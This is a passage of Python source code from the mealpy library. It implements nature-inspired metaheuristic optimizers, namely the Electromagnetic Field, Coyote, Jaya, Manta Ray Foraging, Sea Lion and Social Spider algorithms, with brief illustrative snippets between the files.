def __init__(self, problem, epoch=10000, pop_size=100, r_rate=0.3, ps_rate=0.85, p_field=0.1, n_field=0.45, **kwargs):
"""
Args:
problem ():
epoch (int): maximum number of iterations, default = 10000
pop_size (int): number of population size, default = 100
r_rate (): default = 0.3 Like mutation parameter in GA but for one variable
ps_rate (): default = 0.85 Like crossover parameter in GA
p_field (): default = 0.1 portion of population, positive field
n_field (): default = 0.45 portion of population, negative field
**kwargs ():
"""
super().__init__(problem, kwargs)
self.nfe_per_epoch = pop_size
self.sort_flag = True
self.epoch = epoch
self.pop_size = pop_size
self.r_rate = r_rate
self.ps_rate = ps_rate
self.p_field = p_field
self.n_field = n_field
self.phi = (1 + np.sqrt(5)) / 2 # golden ratio
def evolve(self, epoch):
"""
Args:
epoch (int): The current iteration
"""
pop_new = []
for idx in range(0, self.pop_size):
r_idx1 = np.random.randint(0, int(self.pop_size * self.p_field)) # top
r_idx2 = np.random.randint(int(self.pop_size * (1 - self.n_field)), self.pop_size) # bottom
r_idx3 = np.random.randint(int((self.pop_size * self.p_field) + 1), int(self.pop_size * (1 - self.n_field))) # middle
if np.random.uniform() < self.ps_rate:
# new = g_best + phi* r1 * (top - middle) + r2 (top - bottom)
# pos_new = g_best[self.ID_POS] + \
# phi * np.random.uniform() * (pop[r_idx1][self.ID_POS] - pop[r_idx3][self.ID_POS]) + \
# np.random.uniform() * (pop[r_idx1][self.ID_POS] - pop[r_idx2][self.ID_POS])
# new = top + phi * r1 * (g_best - bottom) + r2 * (g_best - middle)
pos_new = self.pop[r_idx1][self.ID_POS] + self.phi * np.random.uniform() * (self.g_best[self.ID_POS] - self.pop[r_idx3][self.ID_POS]) \
+ np.random.uniform() * (self.g_best[self.ID_POS] - self.pop[r_idx2][self.ID_POS])
else:
# new = top
# pos_new = self.levy_flight(epoch + 1, self.pop[idx][self.ID_POS], self.g_best[self.ID_POS])
pos_new = np.random.uniform(self.problem.lb, self.problem.ub)
# replacement of one electromagnet of generated particle with a random number
# (only for some generated particles) to bring diversity to the population
if np.random.uniform() < self.r_rate:
RI = np.random.randint(0, self.problem.n_dims)
pos_new[np.random.randint(0, self.problem.n_dims)] = np.random.uniform(self.problem.lb[RI], self.problem.ub[RI])
# checking whether the generated number is inside boundary or not
pos_new = self.amend_position_random(pos_new)
pop_new.append([pos_new, None])
pop_new = self.update_fitness_population(pop_new)
self.pop = self.greedy_selection_population(self.pop, pop_new)
class OriginalEFO(BaseEFO):
"""
The original version of : Electromagnetic Field Optimization (EFO)
(Electromagnetic field optimization: A physics-inspired metaheuristic optimization algorithm)
Link:
https://www.mathworks.com/matlabcentral/fileexchange/52744-electromagnetic-field-optimization-a-physics-inspired-metaheuristic-optimization-algorithm
https://www.mathworks.com/matlabcentral/fileexchange/73352-equilibrium-optimizer-eo
"""
def __init__(self, problem, epoch=10000, pop_size=100, r_rate=0.3, ps_rate=0.85, p_field=0.1, n_field=0.45, **kwargs):
"""
Args:
problem ():
epoch (int): maximum number of iterations, default = 10000
pop_size (int): number of population size, default = 100
r_rate (): default = 0.3 Like mutation parameter in GA but for one variable
ps_rate (): default = 0.85 Like crossover parameter in GA
p_field (): default = 0.1 portion of population, positive field
n_field (): default = 0.45 portion of population, negative field
**kwargs ():
"""
super().__init__(problem, epoch, pop_size, r_rate, ps_rate, p_field, n_field, **kwargs)
self.nfe_per_epoch = pop_size
self.sort_flag = True
def initialization(self):
pop = self.create_population(self.pop_size)
self.pop, self.g_best = self.get_global_best_solution(pop)
        # Random vectors: to increase calculation speed, instead of generating the random values in each
        # iteration we allocate them all at the beginning, before the algorithm starts
self.r_index1 = np.random.randint(0, int(self.pop_size * self.p_field), (self.problem.n_dims, self.epoch))
# random particles from positive field
self.r_index2 = np.random.randint(int(self.pop_size * (1 - self.n_field)), self.pop_size, (self.problem.n_dims, self.epoch))
# random particles from negative field
self.r_index3 = np.random.randint(int((self.pop_size * self.p_field) + 1), int(self.pop_size * (1 - self.n_field)), (self.problem.n_dims, self.epoch))
# random particles from neutral field
self.ps = np.random.uniform(0, 1, (self.problem.n_dims, self.epoch))
# Probability of selecting electromagnets of generated particle from the positive field
self.r_force = np.random.uniform(0, 1, self.epoch)
# random force in each generation
self.rp = np.random.uniform(0, 1, self.epoch)
# Some random numbers for checking randomness probability in each generation
self.randomization = np.random.uniform(0, 1, self.epoch)
# Coefficient of randomization when generated electro magnet is out of boundary
self.RI = 0
# index of the electromagnet (variable) which is going to be initialized by random number
def evolve(self, epoch):
"""
Args:
epoch (int): The current iteration
"""
r = self.r_force[epoch]
x_new = np.zeros(self.problem.n_dims) # temporary array to store generated particle
for i in range(0, self.problem.n_dims):
if self.ps[i, epoch] > self.ps_rate:
x_new[i] = self.pop[self.r_index3[i, epoch]][self.ID_POS][i] + \
self.phi * r * (self.pop[self.r_index1[i, epoch]][self.ID_POS][i] - self.pop[self.r_index3[i, epoch]][self.ID_POS][i]) + \
r * (self.pop[self.r_index3[i, epoch]][self.ID_POS][i] - self.pop[self.r_index2[i, epoch]][self.ID_POS][i])
else:
x_new[i] = self.pop[self.r_index1[i, epoch]][self.ID_POS][i]
# replacement of one electromagnet of generated particle with a random number (only for some generated particles) to bring diversity to the population
if self.rp[epoch] < self.r_rate:
x_new[self.RI] = self.problem.lb[self.RI] + (self.problem.ub[self.RI] - self.problem.lb[self.RI]) * self.randomization[epoch]
            self.RI = self.RI + 1
            if self.RI >= self.problem.n_dims:
                self.RI = 0
# checking whether the generated number is inside boundary or not
pos_new = self.amend_position_random(x_new)
fit_new = self.get_fitness_position(pos_new)
        # Update the population if the fitness of the generated particle is better than the worst fitness
        # in the population (the population is sorted by fitness, so the last particle is the worst)
        if self.compare_agent([pos_new, fit_new], self.pop[-1]):
            self.pop[-1] = [pos_new, fit_new]
```
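A quick sketch of how the three index ranges used by both EFO variants partition a population that is kept sorted best-first, under the default `p_field=0.1` and `n_field=0.45`; the population size is illustrative.
```python
pop_size, p_field, n_field = 100, 0.1, 0.45

positive = range(0, int(pop_size * p_field))                                 # best solutions
neutral = range(int(pop_size * p_field) + 1, int(pop_size * (1 - n_field)))  # middle solutions
negative = range(int(pop_size * (1 - n_field)), pop_size)                    # worst solutions

print("positive field:", list(positive))   # indices 0..9
print("neutral field: ", list(neutral))    # indices 11..54
print("negative field:", list(negative))   # indices 55..99
```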
#### File: mealpy/swarm_based/COA.py
```python
import numpy as np
from copy import deepcopy
from mealpy.optimizer import Optimizer
class BaseCOA(Optimizer):
"""
The original version of: Coyote Optimization Algorithm (COA)
(Coyote Optimization Algorithm: A new metaheuristic for global optimization problems)
Link:
https://ieeexplore.ieee.org/document/8477769
Old version (Mealpy < 1.2.2) use this Ref code: https://github.com/jkpir/COA/blob/master/COA.py
"""
ID_AGE = 2
def __init__(self, problem, epoch=10000, pop_size=100, n_coyotes=5, **kwargs):
"""
Args:
problem ():
epoch (int): maximum number of iterations, default = 10000
pop_size (int): number of population size, default = 100
n_coyotes (int): number of coyotes per group
**kwargs ():
"""
super().__init__(problem, kwargs)
self.nfe_per_epoch = pop_size + 1
self.sort_flag = False
self.epoch = epoch
self.pop_size = pop_size
self.n_coyotes = n_coyotes
self.n_packs = int(pop_size/self.n_coyotes)
self.ps = 1 / self.problem.n_dims
self.p_leave = 0.005 * (self.n_coyotes**2) # Probability of leaving a pack
def create_solution(self):
pos = np.random.uniform(self.problem.lb, self.problem.ub)
fit = self.get_fitness_position(pos)
age = 1
return [pos, fit, age]
def _create_pop_group(self, pop):
pop_group = []
for i in range(0, self.n_packs):
group = pop[i*self.n_coyotes:(i+1)*self.n_coyotes]
pop_group.append(group)
return pop_group
def initialization(self):
self.pop = self.create_population(self.pop_size)
self.pop_group = self._create_pop_group(self.pop)
_, self.g_best = self.get_global_best_solution(self.pop)
def evolve(self, epoch):
"""
Args:
epoch (int): The current iteration
"""
# Execute the operations inside each pack
for p in range(self.n_packs):
# Get the coyotes that belong to each pack
self.pop_group[p], local_best = self.get_global_best_solution(self.pop_group[p])
# Detect alphas according to the costs (Eq. 5)
# Compute the social tendency of the pack (Eq. 6)
            tendency = np.mean([agent[self.ID_POS] for agent in self.pop_group[p]], axis=0)
# Update coyotes' social condition
pop_new = []
for i in range(self.n_coyotes):
rc1, rc2 = np.random.choice(list(set(range(0, self.n_coyotes)) - {i}), 2, replace=False)
# Try to update the social condition according to the alpha and the pack tendency(Eq. 12)
pos_new = self.pop_group[p][i][self.ID_POS] + np.random.rand() * \
(self.pop_group[p][0][self.ID_POS] - self.pop_group[p][rc1][self.ID_POS]) + \
np.random.rand() * (tendency - self.pop_group[p][rc2][self.ID_POS])
# Keep the coyotes in the search space (optimization problem constraint)
pos_new = self.amend_position_faster(pos_new)
pop_new.append([pos_new, None, self.pop_group[p][i][self.ID_AGE]])
# Evaluate the new social condition (Eq. 13)
pop_new = self.update_fitness_population(pop_new)
# Adaptation (Eq. 14)
self.pop_group[p] = self.greedy_selection_population(self.pop_group[p], pop_new)
# Birth of a new coyote from random parents (Eq. 7 and Alg. 1)
id_dad, id_mom = np.random.choice(list(range(0, self.n_coyotes)), 2, replace=False)
prob1 = (1 - self.ps) / 2
# Generate the pup considering intrinsic and extrinsic influence
pup = np.where(np.random.uniform(0, 1, self.problem.n_dims) < prob1,
self.pop_group[p][id_dad][self.ID_POS], self.pop_group[p][id_mom][self.ID_POS])
# Eventual noise
pos_new = np.random.normal(0, 1) * pup
pos_new = self.amend_position_faster(pos_new)
fit_new = self.get_fitness_position(pos_new)
# Verify if the pup will survive
packs, local_best = self.get_global_best_solution(self.pop_group[p])
            # If the new pup is better than the worst coyote of the pack, it survives
if self.compare_agent([pos_new, fit_new], packs[-1]):
packs = sorted(packs, key=lambda agent: agent[self.ID_AGE])
                # Replace the oldest coyote with the newborn pup (age = 0)
packs[-1] = [pos_new, fit_new, 0]
self.pop_group[p] = deepcopy(packs)
# A coyote can leave a pack and enter in another pack (Eq. 4)
if self.n_packs > 1:
if np.random.rand() < self.p_leave:
id_pack1, id_pack2 = np.random.choice(list(range(0, self.n_packs)), 2, replace=False)
id1, id2 = np.random.choice(list(range(0, self.n_coyotes)), 2, replace=False)
self.pop_group[id_pack1][id1], self.pop_group[id_pack2][id2] = self.pop_group[id_pack2][id2], self.pop_group[id_pack1][id1]
# Update coyotes ages
for id_pack in range(0, self.n_packs):
for id_coy in range(0, self.n_coyotes):
self.pop_group[id_pack][id_coy][self.ID_AGE] += 1
self.pop = [agent for pack in self.pop_group for agent in pack]
```
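A standalone sketch of the pup generation step (Eq. 7) in BaseCOA above: every dimension is inherited from the father with probability `(1 - ps) / 2` and from the mother otherwise, via a single `np.where` mask, and the result is then scaled by the scalar Gaussian factor the class applies. The dimensions and seed are illustrative.
```python
import numpy as np

np.random.seed(2)
n_dims = 6
ps = 1 / n_dims          # scatter probability, as defined in BaseCOA.__init__
prob1 = (1 - ps) / 2     # probability of inheriting a gene from the father

dad = np.random.uniform(-5, 5, n_dims)
mom = np.random.uniform(-5, 5, n_dims)

# Eq. 7: per-dimension inheritance mask, then the scalar Gaussian factor used in the class above
pup = np.where(np.random.uniform(0, 1, n_dims) < prob1, dad, mom)
pup = np.random.normal(0, 1) * pup
print(pup)
```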
#### File: mealpy/swarm_based/JA.py
```python
import numpy as np
from mealpy.optimizer import Optimizer
class BaseJA(Optimizer):
"""
My original version of: Jaya Algorithm (JA)
(A simple and new optimization algorithm for solving constrained and unconstrained optimization problems)
Link:
https://www.researchgate.net/publication/282532308_Jaya_A_simple_and_new_optimization_algorithm_for_solving_constrained_and_unconstrained_optimization_problems
Notes:
        + Removes the third (per-dimension) loop of the original algorithm
        + Changes the second random coefficient r2 to a Gaussian draw instead of a uniform one
"""
def __init__(self, problem, epoch=10000, pop_size=100, **kwargs):
"""
Args:
problem ():
epoch (int): maximum number of iterations, default = 10000
pop_size (int): number of population size, default = 100
**kwargs ():
"""
super().__init__(problem, kwargs)
self.nfe_per_epoch = pop_size
self.sort_flag = False
self.epoch = epoch
self.pop_size = pop_size
def evolve(self, epoch):
"""
Args:
epoch (int): The current iteration
"""
_, best, worst = self.get_special_solutions(self.pop, best=1, worst=1)
g_best, g_worst = best[0], worst[0]
pop_new = []
for idx in range(0, self.pop_size):
pos_new = self.pop[idx][self.ID_POS] + np.random.uniform() * (g_best[self.ID_POS] - np.abs(self.pop[idx][self.ID_POS])) + \
np.random.normal() * (g_worst[self.ID_POS] - np.abs(self.pop[idx][self.ID_POS]))
pos_new = self.amend_position_faster(pos_new)
pop_new.append([pos_new, None])
self.pop = self.update_fitness_population(pop_new)
class OriginalJA(BaseJA):
"""
The original version of: Jaya Algorithm (JA)
(A simple and new optimization algorithm for solving constrained and unconstrained optimization problems)
Link:
http://www.growingscience.com/ijiec/Vol7/IJIEC_2015_32.pdf
"""
def __init__(self, problem, epoch=10000, pop_size=100, **kwargs):
"""
Args:
problem ():
epoch (int): maximum number of iterations, default = 10000
pop_size (int): number of population size, default = 100
**kwargs ():
"""
super().__init__(problem, epoch, pop_size, **kwargs)
def evolve(self, epoch):
"""
Args:
epoch (int): The current iteration
"""
_, best, worst = self.get_special_solutions(self.pop, best=1, worst=1)
g_best, g_worst = best[0], worst[0]
pop_new = []
for idx in range(0, self.pop_size):
pos_new = self.pop[idx][self.ID_POS] + np.random.uniform(0, 1, self.problem.n_dims) * \
(g_best[self.ID_POS] - np.abs(self.pop[idx][self.ID_POS])) - \
np.random.uniform(0, 1, self.problem.n_dims) * (g_worst[self.ID_POS] - np.abs(self.pop[idx][self.ID_POS]))
pos_new = self.amend_position_faster(pos_new)
pop_new.append([pos_new, None])
self.pop = self.update_fitness_population(pop_new)
class LevyJA(BaseJA):
"""
The original version of: Levy-flight Jaya Algorithm (LJA)
(An improved Jaya optimization algorithm with Levy flight)
Link:
+ https://doi.org/10.1016/j.eswa.2020.113902
Note:
        + This version still removes the third (per-dimension) loop of the algorithm
        + The paper reports beta = 1.8 as the best value for the Levy flight
"""
def __init__(self, problem, epoch=10000, pop_size=100, **kwargs):
"""
Args:
problem ():
epoch (int): maximum number of iterations, default = 10000
pop_size (int): number of population size, default = 100
**kwargs ():
"""
super().__init__(problem, epoch, pop_size, **kwargs)
self.nfe_per_epoch = pop_size
self.sort_flag = False
def evolve(self, epoch):
"""
Args:
epoch (int): The current iteration
"""
_, best, worst = self.get_special_solutions(self.pop, best=1, worst=1)
g_best, g_worst = best[0], worst[0]
pop_new = []
for idx in range(0, self.pop_size):
L1 = self.get_levy_flight_step(multiplier=1.0, beta=1.0, case=-1)
L2 = self.get_levy_flight_step(multiplier=1.0, beta=1.0, case=-1)
pos_new = self.pop[idx][self.ID_POS] + np.abs(L1) * (g_best[self.ID_POS] - np.abs(self.pop[idx][self.ID_POS])) - \
np.abs(L2) * (g_worst[self.ID_POS] - np.abs(self.pop[idx][self.ID_POS]))
pos_new = self.amend_position_faster(pos_new)
pop_new.append([pos_new, None])
self.pop = self.update_fitness_population(pop_new)
```
#### File: mealpy/swarm_based/MRFO.py
```python
import numpy as np
from mealpy.optimizer import Optimizer
class BaseMRFO(Optimizer):
"""
The original version of: Manta Ray Foraging Optimization (MRFO)
(Manta ray foraging optimization: An effective bio-inspired optimizer for engineering applications)
Link:
https://doi.org/10.1016/j.engappai.2019.103300
"""
def __init__(self, problem, epoch=10000, pop_size=100, somersault_range=2, **kwargs):
"""
Args:
problem ():
epoch (int): maximum number of iterations, default = 10000
pop_size (int): number of population size, default = 100
somersault_range (): somersault factor that decides the somersault range of manta rays, default=2
**kwargs ():
"""
super().__init__(problem, kwargs)
self.nfe_per_epoch = 2 * pop_size
self.sort_flag = False
self.epoch = epoch
self.pop_size = pop_size
self.somersault_range = somersault_range
def evolve(self, epoch):
"""
Args:
epoch (int): The current iteration
"""
pop_new = []
for idx in range(0, self.pop_size):
# Cyclone foraging (Eq. 5, 6, 7)
if np.random.rand() < 0.5:
r1 = np.random.uniform()
beta = 2 * np.exp(r1 * (self.epoch - epoch) / self.epoch) * np.sin(2 * np.pi * r1)
if (epoch + 1) / self.epoch < np.random.rand():
x_rand = np.random.uniform(self.problem.lb, self.problem.ub)
if idx == 0:
x_t1 = x_rand + np.random.uniform() * (x_rand - self.pop[idx][self.ID_POS]) + \
beta * (x_rand - self.pop[idx][self.ID_POS])
else:
x_t1 = x_rand + np.random.uniform() * (self.pop[idx - 1][self.ID_POS] - self.pop[idx][self.ID_POS]) + \
beta * (x_rand - self.pop[idx][self.ID_POS])
else:
if idx == 0:
x_t1 = self.g_best[self.ID_POS] + np.random.uniform() * (self.g_best[self.ID_POS] - self.pop[idx][self.ID_POS]) + \
beta * (self.g_best[self.ID_POS] - self.pop[idx][self.ID_POS])
else:
x_t1 = self.g_best[self.ID_POS] + np.random.uniform() * (self.pop[idx - 1][self.ID_POS] - self.pop[idx][self.ID_POS]) + \
beta * (self.g_best[self.ID_POS] - self.pop[idx][self.ID_POS])
# Chain foraging (Eq. 1,2)
else:
r = np.random.uniform()
alpha = 2 * r * np.sqrt(np.abs(np.log(r)))
if idx == 0:
x_t1 = self.pop[idx][self.ID_POS] + r * (self.g_best[self.ID_POS] - self.pop[idx][self.ID_POS]) + \
alpha * (self.g_best[self.ID_POS] - self.pop[idx][self.ID_POS])
else:
x_t1 = self.pop[idx][self.ID_POS] + r * (self.pop[idx - 1][self.ID_POS] - self.pop[idx][self.ID_POS]) + \
alpha * (self.g_best[self.ID_POS] - self.pop[idx][self.ID_POS])
pos_new = self.amend_position_faster(x_t1)
pop_new.append([pos_new, None])
pop_new = self.update_fitness_population(pop_new)
pop_new = self.greedy_selection_population(self.pop, pop_new)
_, g_best = self.update_global_best_solution(pop_new, save=False)
pop_child = []
for idx in range(0, self.pop_size):
# Somersault foraging (Eq. 8)
x_t1 = pop_new[idx][self.ID_POS] + self.somersault_range * \
(np.random.uniform() * g_best[self.ID_POS] - np.random.uniform() * pop_new[idx][self.ID_POS])
pos_new = self.amend_position_faster(x_t1)
pop_child.append([pos_new, None])
pop_child = self.update_fitness_population(pop_child)
self.pop = self.greedy_selection_population(pop_new, pop_child)
```
#### File: mealpy/swarm_based/SLO.py
```python
import numpy as np
from math import gamma
from copy import deepcopy
from mealpy.optimizer import Optimizer
class BaseSLO(Optimizer):
"""
The original version of: Sea Lion Optimization Algorithm (SLO)
(Sea Lion Optimization Algorithm)
Link:
https://www.researchgate.net/publication/333516932_Sea_Lion_Optimization_Algorithm
DOI: 10.14569/IJACSA.2019.0100548
Notes:
+ The original paper is unclear in some equations and parameters
+ This version is based on my expertise
"""
def __init__(self, problem, epoch=10000, pop_size=100, **kwargs):
"""
Args:
problem ():
epoch (int): maximum number of iterations, default = 10000
pop_size (int): number of population size, default = 100
**kwargs ():
"""
super().__init__(problem, kwargs)
self.nfe_per_epoch = pop_size
self.sort_flag = False
self.epoch = epoch
self.pop_size = pop_size
def evolve(self, epoch):
"""
Args:
epoch (int): The current iteration
"""
c = 2 - 2 * epoch / self.epoch
t0 = np.random.rand()
v1 = np.sin(2 * np.pi * t0)
v2 = np.sin(2 * np.pi * (1 - t0))
        SP_leader = np.abs(v1 * (1 + v2) / v2)  # The paper is not clear about how this should be calculated
pop_new = []
for idx in range(0, self.pop_size):
if SP_leader < 0.25:
if c < 1:
pos_new = self.g_best[self.ID_POS] - c * np.abs(2 * np.random.rand() *
self.g_best[self.ID_POS] - self.pop[idx][self.ID_POS])
else:
ri = np.random.choice(list(set(range(0, self.pop_size)) - {idx})) # random index
pos_new = self.pop[ri][self.ID_POS] - c * np.abs(2 * np.random.rand() *
self.pop[ri][self.ID_POS] - self.pop[idx][self.ID_POS])
else:
pos_new = np.abs(self.g_best[self.ID_POS] - self.pop[idx][self.ID_POS]) * \
np.cos(2 * np.pi * np.random.uniform(-1, 1)) + self.g_best[self.ID_POS]
# The paper neither bounds-checks nor updates the old solution at this point
pos_new = self.amend_position_random(pos_new)
pop_new.append([pos_new, None])
pop_new = self.update_fitness_population(pop_new)
self.pop = self.greedy_selection_population(self.pop, pop_new)
class ModifiedSLO(Optimizer):
"""
My modified version of: Sea Lion Optimization (ISLO)
(Sea Lion Optimization Algorithm)
Noted:
+ Using the idea of shrink encircling combine with levy flight techniques
+ Also using the idea of local best in PSO
"""
ID_LOC_POS = 2
ID_LOC_FIT = 3
def __init__(self, problem, epoch=10000, pop_size=100, **kwargs):
"""
Args:
problem ():
epoch (int): maximum number of iterations, default = 10000
pop_size (int): number of population size, default = 100
**kwargs ():
"""
super().__init__(problem, kwargs)
self.nfe_per_epoch = pop_size
self.sort_flag = False
self.epoch = epoch
self.pop_size = pop_size
def create_solution(self):
"""
Returns:
The new solution with 2 elements: index of position/location and index of fitness wrapper
The general format: [position, [target, [obj1, obj2, ...]]]
## To get the position, fitness wrapper, target and obj list
## A[self.ID_POS] --> Return: position
## A[self.ID_FIT] --> Return: [target, [obj1, obj2, ...]]
## A[self.ID_FIT][self.ID_TAR] --> Return: target
## A[self.ID_FIT][self.ID_OBJ] --> Return: [obj1, obj2, ...]
"""
## Increase exploration at the first initial population using opposition-based learning.
position = np.random.uniform(self.problem.lb, self.problem.ub)
fitness = self.get_fitness_position(position=position)
local_pos = self.problem.lb + self.problem.ub - position
local_fit = self.get_fitness_position(local_pos)
if fitness < local_fit:
return [local_pos, local_fit, position, fitness]
else:
return [position, fitness, local_pos, local_fit]
def _shrink_encircling_levy__(self, current_pos, epoch, dist, c, beta=1):
up = gamma(1 + beta) * np.sin(np.pi * beta / 2)
down = (gamma((1 + beta) / 2) * beta * np.power(2, (beta - 1) / 2))
xich_ma_1 = np.power(up / down, 1 / beta)
xich_ma_2 = 1
a = np.random.normal(0, xich_ma_1, 1)
b = np.random.normal(0, xich_ma_2, 1)
LB = 0.01 * a / (np.power(np.abs(b), 1 / beta)) * dist * c
D = np.random.uniform(self.problem.lb, self.problem.ub)
levy = LB * D
return (current_pos - np.sqrt(epoch + 1) * np.sign(np.random.random(1) - 0.5)) * levy
def evolve(self, epoch):
"""
Args:
epoch (int): The current iteration
"""
c = 2 - 2 * epoch / self.epoch
if c > 1:
pa = 0.3 # At the beginning of the process, the probability for shrinking encircling is small
else:
pa = 0.7 # But at the end of the process it becomes larger, because the sea lions are shrinking the encirclement of the prey
SP_leader = np.random.uniform(0, 1)
pop_new = []
for idx in range(0, self.pop_size):
agent = deepcopy(self.pop[idx])
if SP_leader >= 0.6:
pos_new = np.cos(2 * np.pi * np.random.normal(0, 1)) * \
np.abs(self.g_best[self.ID_POS] - self.pop[idx][self.ID_POS]) + self.g_best[self.ID_POS]
else:
if np.random.uniform() < pa:
dist1 = np.random.uniform() * np.abs(2 * self.g_best[self.ID_POS] - self.pop[idx][self.ID_POS])
pos_new = self._shrink_encircling_levy__(self.pop[idx][self.ID_POS], epoch, dist1, c)
else:
rand_SL = self.pop[np.random.randint(0, self.pop_size)][self.ID_LOC_POS]
rand_SL = 2 * self.g_best[self.ID_POS] - rand_SL
pos_new = rand_SL - c * np.abs(np.random.uniform() * rand_SL - self.pop[idx][self.ID_POS])
agent[self.ID_POS] = self.amend_position_random(pos_new)
pop_new.append(agent)
pop_new = self.update_fitness_population(pop_new)
for idx in range(0, self.pop_size):
if self.compare_agent(pop_new[idx], self.pop[idx]):
self.pop[idx] = deepcopy(pop_new[idx])
if self.compare_agent(pop_new[idx], [None, self.pop[idx][self.ID_LOC_FIT]]):
self.pop[idx][self.ID_LOC_POS] = deepcopy(pop_new[idx][self.ID_POS])
self.pop[idx][self.ID_LOC_FIT] = deepcopy(pop_new[idx][self.ID_FIT])
class ISLO(ModifiedSLO):
"""
My improved version of: Improved Sea Lion Optimization Algorithm (ISLO)
(Sea Lion Optimization Algorithm)
Link:
https://www.researchgate.net/publication/333516932_Sea_Lion_Optimization_Algorithm
DOI: 10.14569/IJACSA.2019.0100548
"""
def __init__(self, problem, epoch=10000, pop_size=100, c1=1.2, c2=1.2, **kwargs):
"""
Args:
problem ():
epoch (int): maximum number of iterations, default = 10000
pop_size (int): number of population size, default = 100
**kwargs ():
"""
super().__init__(problem, epoch, pop_size, **kwargs)
self.nfe_per_epoch = pop_size
self.sort_flag = False
self.epoch = epoch
self.pop_size = pop_size
self.c1 = c1
self.c2 = c2
def evolve(self, epoch):
"""
Args:
epoch (int): The current iteration
"""
c = 2 - 2 * epoch / self.epoch
t0 = np.random.rand()
v1 = np.sin(2 * np.pi * t0)
v2 = np.sin(2 * np.pi * (1 - t0))
SP_leader = np.abs(v1 * (1 + v2) / v2)
pop_new = []
for idx in range(0, self.pop_size):
agent = deepcopy(self.pop[idx])
if SP_leader < 0.5:
if c < 1: # Exploitation improved by historical movement + global best affect
# pos_new = g_best[self.ID_POS] - c * np.abs(2 * rand() * g_best[self.ID_POS] - pop[i][self.ID_POS])
dif1 = np.abs(2 * np.random.rand() * self.g_best[self.ID_POS] - self.pop[idx][self.ID_POS])
dif2 = np.abs(2 * np.random.rand() * self.pop[idx][self.ID_LOC_POS] - self.pop[idx][self.ID_POS])
pos_new = self.c1 * np.random.rand() * (self.pop[idx][self.ID_POS] - c * dif1) + \
self.c2 * np.random.rand() * (self.pop[idx][self.ID_POS] - c * dif2)
else: # Exploration improved by opposition-based learning
# Create a new solution by equation below
# Then create an opposition solution of above solution
# Compare both of them and keep the good one (Searching at both direction)
pos_new = self.g_best[self.ID_POS] + c * np.random.normal(0, 1, self.problem.n_dims) * \
(self.g_best[self.ID_POS] - self.pop[idx][self.ID_POS])
fit_new = self.get_fitness_position(self.amend_position_faster(pos_new))
pos_new_oppo = self.problem.lb + self.problem.ub - self.g_best[self.ID_POS] + \
np.random.rand() * (self.g_best[self.ID_POS] - pos_new)
fit_new_oppo = self.get_fitness_position(self.amend_position_faster(pos_new_oppo))
if self.compare_agent([pos_new_oppo, fit_new_oppo], [pos_new, fit_new]):
pos_new = pos_new_oppo
else: # Exploitation
pos_new = self.g_best[self.ID_POS] + np.cos(2 * np.pi * np.random.uniform(-1, 1)) * \
np.abs(self.g_best[self.ID_POS] - self.pop[idx][self.ID_POS])
agent[self.ID_POS] = self.amend_position_random(pos_new)
pop_new.append(agent)
pop_new = self.update_fitness_population(pop_new)
for idx in range(0, self.pop_size):
if self.compare_agent(pop_new[idx], self.pop[idx]):
self.pop[idx] = deepcopy(pop_new[idx])
if self.compare_agent(pop_new[idx], [None, self.pop[idx][self.ID_LOC_FIT]]):
self.pop[idx][self.ID_LOC_POS] = deepcopy(pop_new[idx][self.ID_POS])
self.pop[idx][self.ID_LOC_FIT] = deepcopy(pop_new[idx][self.ID_FIT])
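# Illustrative usage sketch (an assumption, not part of this file): optimizers of this
# mealpy generation are typically driven through the Optimizer base class' solve() entry
# point with a problem dict; the exact dict keys (e.g. "fit_func" vs "obj_func") depend
# on the installed mealpy version.
# problem = {"fit_func": lambda x: np.sum(x ** 2), "lb": [-10] * 30, "ub": [10] * 30, "minmax": "min"}
# model = ISLO(problem, epoch=100, pop_size=50, c1=1.2, c2=1.2)
# best_position, best_fitness = model.solve()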
```
#### File: mealpy/swarm_based/SSpiderA.py
```python
import numpy as np
from copy import deepcopy
from scipy.spatial.distance import cdist
from mealpy.optimizer import Optimizer
class BaseSSpiderA(Optimizer):
"""
My modified version of: Social Spider Algorithm (BaseSSpiderA)
(A social spider algorithm for global optimization)
Link:
https://doi.org/10.1016/j.asoc.2015.02.014
Notes:
+ Changes the idea of intensity: whichever spider has the better intensity, the others will move toward it
"""
ID_POS = 0
ID_FIT = 1
ID_INT = 2
ID_TARGET_POS = 3
ID_PREV_MOVE_VEC = 4
ID_MASK = 5
def __init__(self, problem, epoch=10000, pop_size=100, r_a=1, p_c=0.7, p_m=0.1, **kwargs):
"""
Args:
problem ():
epoch (int): maximum number of iterations, default = 10000
pop_size (int): number of population size, default = 100
r_a (float): the rate of vibration attenuation when propagating over the spider web, default=1.0
p_c (float): controls the probability of the spiders changing their dimension mask in the random walk step, default=0.7
p_m (float): the probability of each value in a dimension mask to be one, default=0.1
**kwargs ():
"""
super().__init__(problem, kwargs)
self.nfe_per_epoch = pop_size
self.sort_flag = False
self.epoch = epoch
self.pop_size = pop_size
self.r_a = r_a
self.p_c = p_c
self.p_m = p_m
def create_solution(self):
"""
Returns:
The new solution with 2 elements: index of position/location and index of fitness wrapper
The general format: [position, [target, [obj1, obj2, ...]]]
## To get the position, fitness wrapper, target and obj list
## A[self.ID_POS] --> Return: position
## A[self.ID_FIT] --> Return: [target, [obj1, obj2, ...]]
## A[self.ID_FIT][self.ID_TAR] --> Return: target
## A[self.ID_FIT][self.ID_OBJ] --> Return: [obj1, obj2, ...]
x: The position of s on the web.
train: The fitness of the current position of s.
target_vibration: The target vibration of s in the previous iteration.
intensity_vibration: intensity of vibration
movement_vector: The movement that s performed in the previous iteration.
dimension_mask: The dimension mask that s employed to guide movement in the previous iteration.
The dimension mask is a 0-1 binary vector of length problem size.
n_changed: The number of iterations since s has last changed its target vibration. (No need)
"""
position = np.random.uniform(self.problem.lb, self.problem.ub)
fitness = self.get_fitness_position(position)
intensity = np.log(1. / (abs(fitness[self.ID_TAR]) + self.EPSILON) + 1)
target_position = deepcopy(position)
previous_movement_vector = np.zeros(self.problem.n_dims)
dimension_mask = np.zeros(self.problem.n_dims)
return [position, fitness, intensity, target_position, previous_movement_vector, dimension_mask]
def evolve(self, epoch):
"""
Args:
epoch (int): The current iteration
"""
all_pos = np.array([it[self.ID_POS] for it in self.pop]) ## Matrix (pop_size, problem_size)
base_distance = np.mean(np.std(all_pos, axis=0)) ## Number
dist = cdist(all_pos, all_pos, 'euclidean')
intensity_source = np.array([it[self.ID_INT] for it in self.pop])
intensity_attenuation = np.exp(-dist / (base_distance * self.r_a)) ## vector (pop_size)
intensity_receive = np.dot(np.reshape(intensity_source, (1, self.pop_size)), intensity_attenuation) ## vector (1, pop_size)
